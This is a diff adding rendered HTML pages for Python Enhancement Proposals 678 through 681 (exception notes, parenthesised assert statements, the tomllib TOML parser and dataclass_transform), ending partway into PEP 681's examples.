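+print(match.__notes__ is not eg.__notes__)  # True: a new list, same contents
+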

+

We do not specify the expected behaviour when users have assigned a non-list +value to __notes__, or a list which contains non-string elements. +Implementations might choose to emit warnings, discard or ignore bad values, +convert them to strings, raise an exception, or do something else entirely.

+
+
+

Backwards Compatibility

+

System-defined or “dunder” names (following the pattern __*__) are part of +the language specification, with unassigned names reserved for future use and +subject to breakage without warning. +We are also unaware of any code which would be broken by adding __notes__.

+

We were also unable to find any code which would be broken by the addition of +BaseException.add_note(): while searching Google and GitHub finds several +definitions +of an .add_note() method, none of them are on a subclass of +BaseException.

+
+
+

How to Teach This

+

The add_note() method and __notes__ attribute will be documented as +part of the language standard, and explained as part of the “Errors and +Exceptions” tutorial.

+
+
+

Reference Implementation

+

Following discussions related to PEP 654 [2], an early version of this +proposal was implemented and released in CPython 3.11.0a3, with a mutable +string-or-none __note__ attribute.

+

CPython PR #31317 +implements .add_note() and __notes__.

+
+
+

Rejected Ideas

+
+

Use print() (or logging, etc.)

+

Reporting explanatory or contextual information about an error by printing or +logging has historically been an acceptable workaround. However, we dislike +the way this separates the content from the exception object it refers to - +which can lead to “orphan” reports if the error was caught and handled later, +or merely significant difficulties working out which explanation corresponds to +which error. The new ExceptionGroup type intensifies these existing +challenges.

+

Keeping the __notes__ attached to the exception object, in the same way as +the __traceback__ attribute, eliminates these problems.

+
+
+

raise Wrapper(explanation) from err

+

An alternative pattern is to use exception chaining: by raising a ‘wrapper’ +exception containing the context or explanation from the current exception, +we avoid the separation challenges from print(). However, this has two key +problems.

+

First, it changes the type of the exception, which is often a breaking change +for downstream code. We consider always raising a Wrapper exception +unacceptably inelegant; but because custom exception types might have any +number of required arguments we can’t always create an instance of the same +type with our explanation. In cases where the exact exception type is known +this can work, such as the standard library http.client code, +but not for libraries which call user code.

+

Second, exception chaining reports several lines of additional detail, which +are distracting for experienced users and can be very confusing for beginners. +For example, six of the eleven lines reported for this simple example relate to +exception chaining, and are unnecessary with BaseException.add_note():

+
class Explanation(Exception):
+    def __str__(self):
+        return "\n" + str(self.args[0])
+
+try:
+    raise AssertionError("Failed!")
+except Exception as e:
+    raise Explanation("You can reproduce this error by ...") from e
+
+
+
$ python example.py
+Traceback (most recent call last):
+File "example.py", line 6, in <module>
+    raise AssertionError(why)
+AssertionError: Failed!
+                                                    # These lines are
+The above exception was the direct cause of ...     # confusing for new
+                                                    # users, and they
+Traceback (most recent call last):                  # only exist due
+File "example.py", line 8, in <module>              # to implementation
+    raise Explanation(msg) from e                   # constraints :-(
+Explanation:                                        # Hence this PEP!
+You can reproduce this error by ...
+
+
+

In cases where these two problems do not apply, we encourage use of exception +chaining rather than __notes__.

+
+
+

An assignable __note__ attribute

+

The first draft and implementation of this PEP defined a single attribute +__note__, which defaulted to None but could have a string assigned. +This is substantially simpler if, and only if, there is at most one note.

+

To promote interoperability and support translation of error messages by +libraries such as friendly-traceback, without resorting to dubious parsing +heuristics, we therefore settled on the .add_note()-and-__notes__ API.

+
+
+

Subclass Exception and add note support downstream

+

Traceback printing is built into the C code, and reimplemented in pure Python +in traceback.py. To get err.__notes__ printed from a downstream +implementation would also require writing custom traceback-printing code; +while this could be shared between projects and reuse some pieces of +traceback.py [3] we prefer to implement this once, upstream.

+

Custom exception types could implement their __str__ method to include our +proposed __notes__ semantics, but this would be rarely and inconsistently +applicable.

+
+
+

Don’t attach notes to Exceptions, just store them in ExceptionGroups

+

The initial motivation for this PEP was to associate a note with each error +in an ExceptionGroup. At the cost of a remarkably awkward API and the +cross-referencing problem discussed above, this +use-case could be supported by storing notes on the ExceptionGroup +instance instead of on each exception it contains.

+

We believe that the cleaner interface, and other use-cases described above, +are sufficient to justify the more general feature proposed by this PEP.

+
+
+

Add a helper function contextlib.add_exc_note()

+

It was suggested +that we add a utility such as the one below to the standard library. We do not +see this idea as core to the proposal of this PEP, and thus leave it for later +or downstream implementation - perhaps based on this example code:

+
@contextlib.contextmanager
+def add_exc_note(note: str):
+    try:
+        yield
+    except Exception as err:
+        err.add_note(note)
+        raise
+
+with add_exc_note(f"While attempting to frobnicate {item=}"):
+    frobnicate_or_raise(item)
+
+
+
+
+

Augment the raise statement

+

One discussion proposed raise Exception() with "note contents", but this +does not address the original motivation of compatibility with +ExceptionGroup.

+

Furthermore, we do not believe that the problem we are solving requires or +justifies new language syntax.

+
+
+
+

Acknowledgements

+

We wish to thank the many people who have assisted us through conversation, +code review, design advice, and implementation: Adam Turner, Alex Grönholm, +André Roberge, Barry Warsaw, Brett Cannon, CAM Gerlach, Carol Willing, Damian, +Erlend Aasland, Etienne Pot, Gregory Smith, Guido van Rossum, Irit Katriel, +Jelle Zijlstra, Ken Jin, Kumar Aditya, Mark Shannon, Matti Picus, Petr +Viktorin, Will McGugan, and pseudonymous commenters on Discord and Reddit.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0678.rst

+

Last modified: 2023-10-10 15:15:34 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-0679/index.html b/pep-0679/index.html new file mode 100644 index 00000000000..7b89ab36fd3 --- /dev/null +++ b/pep-0679/index.html @@ -0,0 +1,281 @@ + PEP 679 – Allow parentheses in assert statements | peps.python.org +
+
+


+ + +
+
+
+

PEP 679 – Allow parentheses in assert statements

+
+
Author:
+
Pablo Galindo Salgado <pablogsal at python.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Draft
+
Type:
+
Standards Track
+
Created:
+
07-Jan-2022
+
Python-Version:
+
3.12
+
+
+
+
+
+

Abstract

+

This PEP proposes to allow parentheses surrounding the two-argument form of +assert statements. This will cause the interpreter to reinterpret what previously +would have been an assert with a two-element tuple that is always true +(assert (expression, message)) as an assert statement with a subject and a +failure message, equivalent to the statement with the parentheses removed +(assert expression, message).

+
+
+

Motivation

+

It is a common user mistake when using the form of the assert statement that includes +the error message to surround it with parentheses. Unfortunately, this mistake +passes undetected as the assert will always pass, because it is +interpreted as an assert statement where the expression is a two-tuple, which +always has a truthy value.

+

The mistake most often happens when extending the test or description beyond a +single line, as parentheses are the natural way to do that.

+

This is so common that a SyntaxWarning is now emitted by the compiler.
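
The warning can be observed programmatically; a minimal check (the exact warning text may vary slightly across CPython versions):

+
import warnings
+
+with warnings.catch_warnings(record=True) as caught:
+    warnings.simplefilter("always")
+    compile('assert (1 == 2, "oops")', "<example>", "exec")
+
+print(caught[0].message)  # assertion is always true, perhaps remove parentheses?
+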

+

Additionally, some other statements in the language allow parenthesized forms +in one way or another like import statements (from x import (a,b,c)) and +del statements (del (a,b,c)).

+

Allowing parentheses not only will remove the common mistake but also will allow +users and auto-formatters to format long assert statements over multiple lines +in what the authors of this document believe will be a more natural way. +Although it is currently possible to format long assert statements over +multiple lines as:

+
assert (
+    very very long
+    expression
+), (
+    "very very long "
+    "message"
+)
+
+
+

the authors of this document believe the parenthesized form is more clear and more consistent with +the formatting of other grammar constructs:

+
assert (
+    very very long
+    expression,
+
+    "very very long "
+    "message",
+)
+
+
+

This change has been originally discussed and proposed in [bpo-46167].

+
+
+

Rationale

+

This change can be implemented in the parser or in the compiler. We have +selected implementing this change in the parser because doing it in the compiler +would require re-interpreting the AST of an assert statement with a two-tuple:

+
Module(
+    body=[
+        Assert(
+            test=Tuple(
+                elts=[
+                    Name(id='x', ctx=Load()),
+                    Name(id='y', ctx=Load())],
+                ctx=Load()))],
+    type_ignores=[])
+
+
+

as the AST of an assert statement with an expression and a message:

+
Module(
+    body=[
+        Assert(
+            test=Name(id='x', ctx=Load()),
+            msg=Name(id='y', ctx=Load()))],
+    type_ignores=[])
+
+
+

The problem with this approach is that the AST of the first form will +technically be “incorrect” as we already have a specialized form for the AST of +an assert statement with a test and a message (the second one). This +means that many tools that deal with ASTs will need to be aware of this change +in semantics, which will be confusing as there is already a correct form that +better expresses the new meaning.

+
+
+

Specification

+

This PEP proposes changing the grammar of the assert statement to:

+
| 'assert' '(' expression ',' expression [','] ')' &(NEWLINE | ';')
+| 'assert' a=expression [',' expression ]
+
+
+

Where the first line is the new form of the assert statement that allows +parentheses. The lookahead is needed so statements like assert (a, b) <= c, +"something" are still parsed correctly and to prevent the parser from eagerly +capturing the tuple as the full statement.
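
For example, this existing, valid code must keep parsing as a tuple comparison rather than as the new parenthesized assert form:

+
a, b, c = 1, 2, (3, 4)
+
+# "(a, b)" here is a tuple compared against c; the lookahead prevents the
+# parser from eagerly capturing it as "(expression, message)".
+assert (a, b) <= c, "tuple comparison failed"
+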

+

Optionally, a new “invalid” rule can be added to produce custom syntax errors +covering tuples with 0, 1, or 3 or more elements.

+
+
+

Backwards Compatibility

+

The change is not technically backwards compatible, as parsing assert (x,y) +is currently interpreted as an assert statement with a 2-tuple as the subject, +while after this change it will be interpreted as assert x,y.

+

On the other hand, assert statements of this kind always pass, so they are +effectively not doing anything in user code. The authors of this document think +that this backwards incompatibility is beneficial, as it will highlight +these cases in user code, whereas before they would have passed unnoticed (assuming that +these cases still exist because users are ignoring syntax warnings).

+
+
+

Security Implications

+

There are no security implications for this change.

+
+
+

How to Teach This

+

The new form of the assert statement will be documented as part of the language +standard.

+

When teaching the form with error message of the assert statement to users, +it can now be noted that adding parentheses also works as expected, which allows +the statement to be broken over multiple lines.

+
+
+

Reference Implementation

+

A proposed draft PR with the change exist in [GH-30247].

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0679.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-0680/index.html b/pep-0680/index.html new file mode 100644 index 00000000000..a66ca5512f8 --- /dev/null +++ b/pep-0680/index.html @@ -0,0 +1,598 @@ + PEP 680 – tomllib: Support for Parsing TOML in the Standard Library | peps.python.org +
+
+


+ + +
+
+
+

PEP 680 – tomllib: Support for Parsing TOML in the Standard Library

+
+
Author:
+
Taneli Hukkinen, Shantanu Jain <hauntsaninja at gmail.com>
+
Sponsor:
+
Petr Viktorin <encukou at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
01-Jan-2022
+
Python-Version:
+
3.11
+
Post-History:
+
09-Dec-2021, +27-Jan-2022
+
Resolution:
+
Python-Dev thread
+
+
+
+
+
+

Important

+

This PEP is a historical document. The up-to-date, canonical documentation can now be found at tomllib.

+


+

See PEP 1 for how to propose changes.

+
+
+

Abstract

+

This PEP proposes adding the tomllib module to the standard library for +parsing TOML (Tom’s Obvious Minimal Language, +https://toml.io).

+
+
+

Motivation

+

TOML is the format of choice for Python packaging, as evidenced by +PEP 517, PEP 518 and PEP 621. This creates a bootstrapping +problem for Python build tools, forcing them to vendor a TOML parsing +package or employ other undesirable workarounds, and causes serious issues +for repackagers and other downstream consumers. Including TOML support in +the standard library would neatly solve all of these issues.

+

Further, many Python tools are now configurable via TOML, such as +black, mypy, pytest, tox, pylint and isort. +Many that are not, such as flake8, cite the lack of standard library +support as a main reason why. +Given the special place TOML already has in the Python ecosystem, it makes sense +for it to be an included battery.

+

Finally, TOML as a format is increasingly popular (for the reasons +outlined in PEP 518), with various Python TOML libraries having about +2000 reverse dependencies on PyPI (for comparison, requests has about +28000 reverse dependencies). Hence, this is likely to be a generally useful +addition, even looking beyond the needs of Python packaging and related tools.

+
+
+

Rationale

+

This PEP proposes basing the standard library support for reading TOML on the +third-party library tomli +(github.com/hukkin/tomli).

+

Many projects have recently switched to using tomli, such as pip, +build, pytest, mypy, black, flit, coverage, +setuptools-scm and cibuildwheel.

+

tomli is actively maintained and well-tested. It is about 800 lines +of code with 100% test coverage, and passes all tests in the +proposed official TOML compliance test suite, as well as +the more established BurntSushi/toml-test suite.

+
+
+

Specification

+

A new module tomllib will be added to the Python standard library, +exposing the following public functions:

+
def load(
+    fp: SupportsRead[bytes],
+    /,
+    *,
+    parse_float: Callable[[str], Any] = ...,
+ ) -> dict[str, Any]: ...
+
+def loads(
+    s: str,
+    /,
+    *,
+    parse_float: Callable[[str], Any] = ...,
+) -> dict[str, Any]: ...
+
+
+

tomllib.load deserializes a binary file-like object containing a +TOML document to a Python dict. +The fp argument must have a read() method with the same API as +io.RawIOBase.read().
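
For example (the file name here is illustrative):

+
import tomllib
+
+# The file must be opened in binary mode; tomllib handles UTF-8 decoding:
+with open("pyproject.toml", "rb") as f:
+    config = tomllib.load(f)
+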

+

tomllib.loads deserializes a str instance containing a TOML document +to a Python dict.

+

The parse_float argument is a callable object that takes as input the +original string representation of a TOML float, and returns a corresponding +Python object (similar to parse_float in json.load). +For example, the user may pass a function returning a decimal.Decimal, +for use cases where exact precision is important. By default, TOML floats +are parsed as instances of the Python float type.
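
For example:

+
import tomllib
+from decimal import Decimal
+
+doc = "pi = 3.14159265358979323846264338327950288"
+print(tomllib.loads(doc)["pi"])                       # a lossy binary64 float
+print(tomllib.loads(doc, parse_float=Decimal)["pi"])  # exact Decimal value
+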

+

The returned object contains only basic Python objects (str, int, +bool, float, datetime.{datetime,date,time}, list, dict with +string keys), and the results of parse_float.

+

tomllib.TOMLDecodeError is raised in the case of invalid TOML.

+

Note that this PEP does not propose tomllib.dump or tomllib.dumps +functions; see Including an API for writing TOML for details.

+
+
+

Maintenance Implications

+
+

Stability of TOML

+

The release of TOML 1.0.0 in January 2021 indicates the TOML format should +now be officially considered stable. Empirically, TOML has proven to be a +stable format even prior to the release of TOML 1.0.0. From the +changelog, we +can see that TOML has had no major changes since April 2020, and has had +two releases in the past five years (2017-2021).

+

In the event of changes to the TOML specification, we can treat minor +revisions as bug fixes and update the implementation in place. In the event of +major breaking changes, we should preserve support for TOML 1.x.

+
+
+

Maintainability of proposed implementation

+

The proposed implementation (tomli) is pure Python, well tested and +weighs in at under 1000 lines of code. It is minimalist, offering a smaller API +surface area than other TOML implementations.

+

The author of tomli is willing to help integrate tomli into the standard +library and help maintain it, as per this post. +Furthermore, Python core developer Petr Viktorin has indicated a willingness +to maintain a read API, as per this post.

+

Rewriting the parser in C is not deemed necessary at this time. It is rare for +TOML parsing to be a bottleneck in applications, and users with higher performance +needs can use a third-party library (as is already often the case with JSON, +despite Python offering a standard library C-extension module).

+
+
+

TOML support as a slippery slope for other things

+

As discussed in the Motivation section, TOML holds a special place in the +Python ecosystem, for reading PEP 518 pyproject.toml packaging +and tool configuration files. +This chief reason to include TOML in the standard library does not apply to +other formats, such as YAML or MessagePack.

+

In addition, the simplicity of TOML distinguishes it from other formats like +YAML, which are highly complicated to construct and parse.

+

An API for writing TOML may, however, be added in a future PEP.

+
+
+
+

Backwards Compatibility

+

This proposal has no backwards compatibility issues within the standard +library, as it describes a new module. +Any existing third-party module named tomllib will break, as +import tomllib will import the standard library module. +However, tomllib is not registered on PyPI, so it is unlikely that any +module with this name is widely used.

+

Note that we avoid using the more straightforward name toml to avoid +backwards compatibility implications for users who have pinned versions of the +current toml PyPI package. +For more details, see the Alternative names for the module section.

+
+
+

Security Implications

+

Errors in the implementation could cause potential security issues. +However, the parser’s output is limited to simple data types; inability to load +arbitrary classes avoids security issues common in more “powerful” formats like +pickle and YAML. Also, the implementation will be in pure Python, which reduces +security issues endemic to C, such as buffer overflows.

+
+
+

How to Teach This

+

The API of tomllib mimics that of other well-established file format +libraries, such as json and pickle. The lack of a dump function will +be explained in the documentation, with a link to relevant third-party libraries +(e.g. tomlkit, tomli-w, pytomlpp).

+
+
+

Reference Implementation

+

The proposed implementation can be found at https://github.com/hukkin/tomli

+
+
+

Rejected Ideas

+
+

Basing on another TOML implementation

+

Several potential alternative implementations exist:

+
    +
  • tomlkit is well established, actively maintained and supports TOML 1.0.0. +An important difference is that tomlkit supports style roundtripping. As a +result, it has a more complex API and implementation (about 5x as much code as +tomli). Its author does not believe that tomlkit is a good choice for +the standard library.
  • +
  • toml is a very widely used library. However, it is not actively +maintained, does not support TOML 1.0.0 and has a number of known bugs. Its +API is more complex than that of tomli. It allows customising output style +through a complicated encoder API, and some very limited and mostly unused +functionality to preserve input style through an undocumented decoder API. +For more details on its API differences from this PEP, refer to Appendix A.
  • +
  • pytomlpp is a Python wrapper for the C++ project toml++. Pure Python +libraries are easier to maintain than extension modules.
  • +
  • rtoml is a Python wrapper for the Rust project toml-rs and hence has +similar shortcomings to pytomlpp. +In addition, it does not support TOML 1.0.0.
  • +
  • Writing an implementation from scratch. It’s unclear what we would get from +this; tomli meets our needs and the author is willing to help with its +inclusion in the standard library.
  • +
+
+
+

Including an API for writing TOML

+

There are several reasons to not include an API for writing TOML.

+

The ability to write TOML is not needed for the use cases that motivate this +PEP: core Python packaging tools, and projects that need to read TOML +configuration files.

+

Use cases that involve editing an existing TOML file (as opposed to writing a +brand new one) are better served by a style preserving library. TOML is +intended as a human-readable and -editable configuration format, so it’s +important to preserve comments, formatting and other markup. This requires +a parser whose output includes style-related metadata, making it impractical +to output plain Python types like str and dict. Furthermore, it +substantially complicates the design of the API.

+

Even without considering style preservation, there are too many degrees of +freedom in how to design a write API. For example, what default style +(indentation, vertical and horizontal spacing, quotes, etc) should the library +use for the output, and how much control should users be given over it? +How should the library handle input and output validation? Should it support +serialization of custom types, and if so, how? While there are reasonable +options for resolving these issues, the nature of the standard library is such +that we only get “one chance to get it right”.

+

Currently, no CPython core developers have expressed willingness to maintain a +write API, or sponsor a PEP that includes one. Since it is hard to change +or remove something in the standard library, it is safer to err on the side of +exclusion for now, and potentially revisit this later.

+

Therefore, writing TOML is left to third-party libraries. If a good API and +relevant use cases for it are found later, write support can be added in a +future PEP.

+
+
+

Assorted API details

+
+

Types accepted as the first argument of tomllib.load

+

The toml library on PyPI allows passing paths (and lists of path-like +objects, ignoring missing files and merging the documents into a single object) +to its load function. However, allowing this here would be inconsistent +with the behavior of json.load, pickle.load and other standard library +functions. If we agree that consistency here is desirable, +allowing paths is out of scope for this PEP. This can easily and explicitly +be worked around in user code, or by using a third-party library.

+

The proposed API takes a binary file, while toml.load takes a text file and +json.load takes either. Using a binary file allows us to ensure UTF-8 is +the encoding used (ensuring correct parsing on platforms with other default +encodings, such as Windows), and avoid incorrectly parsing files containing +single carriage returns as valid TOML due to universal newlines in text mode.

+
+
+

Type accepted as the first argument of tomllib.loads

+

While tomllib.load takes a binary file, tomllib.loads takes +a text string. This may seem inconsistent at first.

+

Quoting the TOML v1.0.0 specification:

+
+
A TOML file must be a valid UTF-8 encoded Unicode document.
+

tomllib.loads does not intend to load a TOML file, but rather the +document that the file stores. The most natural representation of +a Unicode document in Python is str, not bytes.

+

It is possible to add bytes support in the future if needed, but +we are not aware of any use cases for it.

+
+
+
+

Controlling the type of mappings returned by tomllib.load[s]

+

The toml library on PyPI accepts a _dict argument in its load[s] +functions, which works similarly to the object_hook argument in +json.load[s]. There are several uses of _dict found on +https://grep.app; however, almost all of them are passing +_dict=OrderedDict, which should be unnecessary as of Python 3.7. +We found two instances of relevant use: in one case, a custom class was passed +for friendlier KeyErrors; in the other, the custom class had several +additional lookup and mutation methods (e.g. to help resolve dotted keys).

+

Such a parameter is not necessary for the core use cases outlined in the +Motivation section. The absence of this can be pretty easily worked around +using a wrapper class, transformer function, or a third-party library. Finally, +support could be added later in a backward-compatible way.

+
+
+

Removing support for parse_float in tomllib.load[s]

+

This option is not strictly necessary, since TOML floats should be implemented +as “IEEE 754 binary64 values”, which is equivalent to a Python float on most +architectures.

+

The TOML specification uses the word “SHOULD”, however, implying a +recommendation that can be ignored for valid reasons. Parsing floats +differently, such as to decimal.Decimal, allows users extra precision beyond +that promised by the TOML format. In the author of tomli’s experience, this +is particularly useful in scientific and financial applications. This is also +useful for other cases that need greater precision, or where end-users include +non-developers who may not be aware of the limits of binary64 floats.

+

There are also niche architectures where the Python float is not an IEEE 754 +binary64 value. The parse_float argument allows users to achieve correct +TOML semantics even on such architectures.

+
+
+

Alternative names for the module

+

Ideally, we would be able to use the toml module name.

+

However, the toml package on PyPI is widely used, so there are backward +compatibility concerns. Since the standard library takes precedence over third +party packages, libraries and applications that currently depend on the toml +package would likely break when upgrading Python versions due to the many +API incompatibilities listed in Appendix A, +even if they pin their dependency versions.

+

To further clarify, applications with pinned dependencies are of greatest +concern here. Even if we were able to obtain control of the toml PyPI +package name and repurpose it for a backport of the proposed new module, +we would still break users on new Python versions that included it in the +standard library, regardless of whether they have pinned an older version of +the existing toml package. This is unfortunate, since pinning +would likely be a common response to breaking changes introduced by repurposing +the toml package as a backport (that is incompatible with today’s toml).

+

Finally, the toml package on PyPI is not actively maintained, but as of +yet, efforts to request that the author add other maintainers +have been unsuccessful, +so action here would likely have to be taken without the author’s consent.

+

Instead, this PEP proposes the name tomllib. This mirrors plistlib +and xdrlib, two other file format modules in the standard library, as well +as other modules, such as pathlib, contextlib and graphlib.

+

Other names considered but rejected include:

+
    +
  • tomlparser. This mirrors configparser, but is perhaps somewhat less +appropriate if we include a write API in the future.
  • +
  • tomli. This assumes we use tomli as the basis for implementation.
  • +
  • toml under some namespace, such as parser.toml. However, this is +awkward, especially so since existing parsing libraries like json, +pickle, xml, html etc. would not be included in the namespace.
  • +
+
+
+
+

Previous Discussion

+ +
+
+

Appendix A: Differences between proposed API and toml

+

This appendix covers the differences between the API proposed in this PEP and +that of the third-party package toml. These differences are relevant to +understanding the amount of breakage we could expect if we used the toml +name for the standard library module, as well as to better understand the design +space. Note that this list might not be exhaustive.

+
    +
  1. No proposed inclusion of a write API (no toml.dump[s])

    This PEP currently proposes not including a write API; that is, there will +be no equivalent of toml.dump or toml.dumps, as discussed at +Including an API for writing TOML.

    +

    If we included a write API, it would be relatively straightforward to +convert most code that uses toml to the new standard library module +(acknowledging that this is very different from a compatible API, as it +would still require code changes).

    +

    A significant fraction of toml users rely on this, based on comparing +occurrences of “toml.load” +to occurrences of “toml.dump”.

    +
  2. +
  3. Different first argument of toml.load

    toml.load has the following signature:

    +
    def load(
    +    f: Union[SupportsRead[str], str, bytes, list[PathLike | str | bytes]],
    +    _dict: Type[MutableMapping[str, Any]] = ...,
    +    decoder: TomlDecoder = ...,
    +) -> MutableMapping[str, Any]: ...
    +
    +
    +

    This is quite different from the first argument proposed in this PEP: +SupportsRead[bytes].

    +

    Recapping the reasons for this, previously mentioned at +Types accepted as the first argument of tomllib.load:

    +
      +
    • Allowing paths (and even lists of paths) as arguments is inconsistent with +other similar functions in the standard library.
    • +
    • Using SupportsRead[bytes] allows us to ensure UTF-8 is the encoding used, +and avoid incorrectly parsing single carriage returns as valid TOML.
    • +
    +

    A significant fraction of toml users rely on this, based on manual +inspection of occurrences of “toml.load”.

    +
  4. +
  5. Errors

    toml raises TomlDecodeError, vs. the proposed PEP 8-compliant +TOMLDecodeError.

    +

    A significant fraction of toml users rely on this, based on +occurrences of “TomlDecodeError”.

    +
  6. +
  7. toml.load[s] accepts a _dict argument

    Discussed at Controlling the type of mappings returned by tomllib.load[s].

    +

    As mentioned there, almost all usage consists of _dict=OrderedDict, +which is not necessary in Python 3.7 and later.

    +
  8. +
  9. toml.load[s] support an undocumented decoder argument

    It seems the intended use case is for an implementation of comment +preservation. The information recorded is not sufficient to roundtrip the +TOML document preserving style, the implementation has known bugs, the +feature is undocumented and we could only find one instance of its use on +https://grep.app.

    +

    The toml.TomlDecoder interface +exposed is far from simple, containing nine methods.

    +

    Users are likely better served by a more complete implementation of +style-preserving parsing and writing.

    +
  10. +
  11. toml.dump[s] support an encoder argument

    Note that we currently propose to not include a write API; however, if that +were to change, these differences would likely become relevant.

    +

    The encoder argument enables two use cases:

    +
      +
    • control over how custom types should be serialized, and
    • +
    • control over how output should be formatted.
    • +
    +

    The first is reasonable; however, we could only find two instances of +this on https://grep.app. One of these two used this ability to add +support for dumping decimal.Decimal, which a potential standard library +implementation would support out of the box. +If needed for other types, this use case could be well served by the +equivalent of the default argument in json.dump.

    +

    The second use case is enabled by allowing users to specify subclasses of +toml.TomlEncoder +and overriding methods to specify parts of the TOML writing process. The API +consists of five methods and exposes substantial implementation detail.

    +

    There is some usage of the encoder API on https://grep.app; however, it +appears to account for a tiny fraction of the overall usage of toml.

    +
  12. +
  13. Timezones

    toml uses and exposes custom toml.tz.TomlTz timezone objects. The +proposed implementation uses datetime.timezone objects from the standard +library.

    +
  14. +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0680.rst

+

Last modified: 2023-10-10 15:15:34 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-0681/index.html b/pep-0681/index.html new file mode 100644 index 00000000000..bd8d6f31a3d --- /dev/null +++ b/pep-0681/index.html @@ -0,0 +1,872 @@ + PEP 681 – Data Class Transforms | peps.python.org +
+
+


+ + +
+
+
+

PEP 681 – Data Class Transforms

+
+
Author:
+
Erik De Bonte <erikd at microsoft.com>, +Eric Traut <erictr at microsoft.com>
+
Sponsor:
+
Jelle Zijlstra <jelle.zijlstra at gmail.com>
+
Discussions-To:
+
Typing-SIG thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Typing
+
Created:
+
02-Dec-2021
+
Python-Version:
+
3.11
+
Post-History:
+
24-Apr-2021, +13-Dec-2021, +22-Feb-2022
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Attention

+

This PEP is a historical document: see The dataclass_transform decorator and +@typing.dataclass_transform for up-to-date specs and documentation. Canonical typing specs are maintained at the typing specs site; runtime typing behaviour is described in the CPython documentation.

+


+

See the typing specification update process for how to propose changes to the typing spec.

+
+
+

Abstract

+

PEP 557 introduced the dataclass to the Python stdlib. Several popular +libraries have behaviors that are similar to dataclasses, but these +behaviors cannot be described using standard type annotations. Such +projects include attrs, pydantic, and object relational mapper (ORM) +packages such as SQLAlchemy and Django.

+

Most type checkers, linters and language servers have full support for +dataclasses. This proposal aims to generalize this functionality and +provide a way for third-party libraries to indicate that certain +decorator functions, classes, and metaclasses provide behaviors +similar to dataclasses.

+

These behaviors include:

+
    +
  • Synthesizing an __init__ method based on declared +data fields.
  • +
  • Optionally synthesizing __eq__, __ne__, __lt__, +__le__, __gt__ and __ge__ methods.
  • +
  • Supporting “frozen” classes, a way to enforce immutability during +static type checking.
  • +
  • Supporting “field specifiers”, which describe attributes of +individual fields that a static type checker must be aware of, +such as whether a default value is provided for the field.
  • +
+

The full behavior of the stdlib dataclass is described in the Python +documentation.

+

This proposal does not affect CPython directly except for the addition +of a dataclass_transform decorator in typing.py.

+
+
+

Motivation

+

There is no existing, standard way for libraries with dataclass-like +semantics to declare their behavior to type checkers. To work around +this limitation, Mypy custom plugins have been developed for many of +these libraries, but these plugins don’t work with other type +checkers, linters or language servers. They are also costly to +maintain for library authors, and they require that Python developers +know about the existence of these plugins and download and configure +them within their environment.

+
+
+

Rationale

+

The intent of this proposal is not to support every feature of every +library with dataclass-like semantics, but rather to make it possible +to use the most common features of these libraries in a way that is +compatible with static type checking. If a user values these libraries +and also values static type checking, they may need to avoid using +certain features or make small adjustments to the way they use them. +That’s already true for the Mypy custom plugins, which +don’t support every feature of every dataclass-like library.

+

As new features are added to dataclasses in the future, we intend, when +appropriate, to add support for those features on +dataclass_transform as well. Keeping these two feature sets in +sync will make it easier for dataclass users to understand and use +dataclass_transform and will simplify the maintenance of dataclass +support in type checkers.

+

Additionally, we will consider adding dataclass_transform support +in the future for features that have been adopted by multiple +third-party libraries but are not supported by dataclasses.

+
+
+

Specification

+
+

The dataclass_transform decorator

+

This specification introduces a new decorator function in +the typing module named dataclass_transform. This decorator +can be applied to either a function that is itself a decorator, +a class, or a metaclass. The presence of +dataclass_transform tells a static type checker that the decorated +function, class, or metaclass performs runtime “magic” that transforms +a class, endowing it with dataclass-like behaviors.

+

If dataclass_transform is applied to a function, using the decorated +function as a decorator is assumed to apply dataclass-like semantics. +If the function has overloads, the dataclass_transform decorator can +be applied to the implementation of the function or any one, but not more +than one, of the overloads. When applied to an overload, the +dataclass_transform decorator still impacts all usage of the +function.

+
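As an illustrative sketch (using a hypothetical create_model with two call forms, in the style of the examples below), the decorator may sit on the implementation while both overloads get dataclass-like semantics:

from typing import Any, Callable, Type, TypeVar, dataclass_transform, overload

_T = TypeVar("_T")

@overload
def create_model(cls: Type[_T]) -> Type[_T]: ...

@overload
def create_model(*, frozen: bool = False) -> Callable[[Type[_T]], Type[_T]]: ...

# Applied once, to the implementation; every use of ``create_model``
# (bare or with arguments) is treated as a dataclass transform.
@dataclass_transform()
def create_model(cls: Any = None, *, frozen: bool = False) -> Any:
    ...  # implementation omitted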

If dataclass_transform is applied to a class, dataclass-like +semantics will be assumed for any class that directly or indirectly +derives from the decorated class or uses the decorated class as a +metaclass. Attributes on the decorated class and its base classes +are not considered to be fields.

+

Examples of each approach are shown in the following sections. Each +example creates a CustomerModel class with dataclass-like semantics. +The implementation of the decorated objects is omitted for brevity, +but we assume that they modify classes in the following ways:

+
    +
  • They synthesize an __init__ method using data fields declared +within the class and its parent classes.
  • +
  • They synthesize __eq__ and __ne__ methods.
  • +
+

Type checkers supporting this PEP will recognize that the +CustomerModel class can be instantiated using the synthesized +__init__ method:

+
# Using positional arguments
+c1 = CustomerModel(327, "John Smith")
+
+# Using keyword arguments
+c2 = CustomerModel(id=327, name="John Smith")
+
+# These calls will generate runtime errors and should be flagged as
+# errors by a static type checker.
+c3 = CustomerModel()
+c4 = CustomerModel(327, first_name="John")
+c5 = CustomerModel(327, "John Smith", 0)
+
+
+
+

Decorator function example

+
_T = TypeVar("_T")
+
+# The ``create_model`` decorator is defined by a library.
+# This could be in a type stub or inline.
+@typing.dataclass_transform()
+def create_model(cls: Type[_T]) -> Type[_T]:
+    cls.__init__ = ...
+    cls.__eq__ = ...
+    cls.__ne__ = ...
+    return cls
+
+# The ``create_model`` decorator can now be used to create new model
+# classes, like this:
+@create_model
+class CustomerModel:
+    id: int
+    name: str
+
+
+
+
+

Class example

+
# The ``ModelBase`` class is defined by a library. This could be in
+# a type stub or inline.
